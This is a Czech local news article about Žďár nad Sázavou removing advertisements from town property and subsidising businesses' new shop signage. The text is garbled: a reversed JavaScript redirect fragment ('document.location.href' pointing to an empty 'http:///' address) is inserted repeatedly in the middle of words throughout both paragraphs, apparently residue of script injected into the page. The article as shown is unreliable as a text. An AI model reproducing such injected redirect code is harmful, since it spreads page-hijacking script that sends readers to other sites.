Rainbow page separator

Z objektů města mizí reklamy, podnikatelé mohou využít dotaci

Sobota, 10. dubna 2021

Žďár nad Sázavou / Do dotačního programu žďárské radnice se až do konce září mohou přihlásit podnikatelé, kteří mají zájem svoji provozovnu vybavit novou a sofistikovanější reklamou na základě manuálu dobré praxe týkajícího se reklamních sdělení a označování provozoven či obchodních domů. Cílem je řešení reklamního smogu, tedy nadměrné a neestetické reklamy zahlcující veřejný pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor. Manuál, kterým se měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to inspirovalo v městské části Brno – střed a je k dispozici na webu Žďáru, byl rozpracován pro místní potřeby a má sloužit jako návod. Zájemci o dotační podporu budou uspokojováni průběžně, nejpozději však do 15. října. Maximální objem dotace byl stanoven na patnáct tisíc korun, nejméně jde o tři tisíce. Na projektu se však žadatel musí finančně podílet minimálně dvaceti procenty uznatelných nákladů. Z dotačních peněz je možné zaplatit jak grafický návrh nového označení provozovny, tak jeho výrobu i instalaci.
V rámci projektu již byla po předchozím vypovězení smluv odstraněna reklamní sdělení z některých městských budov a ostatních pozemků, například z plotu u zimního stadionu. Podle záměru radnice by reklamy na budovách města měly být kompletně odstraněny v první polovině roku. Mimo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to postupně mizejí i další prvky dlouhodobě hyzdící měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to – kupříkladu vysloužilé be[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonové květináče z náměstí, nefunkční sloupy, pozůstatky zábradlí i nevyužívané klepače na koberce a sušáky na prádlo u některých by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových domů.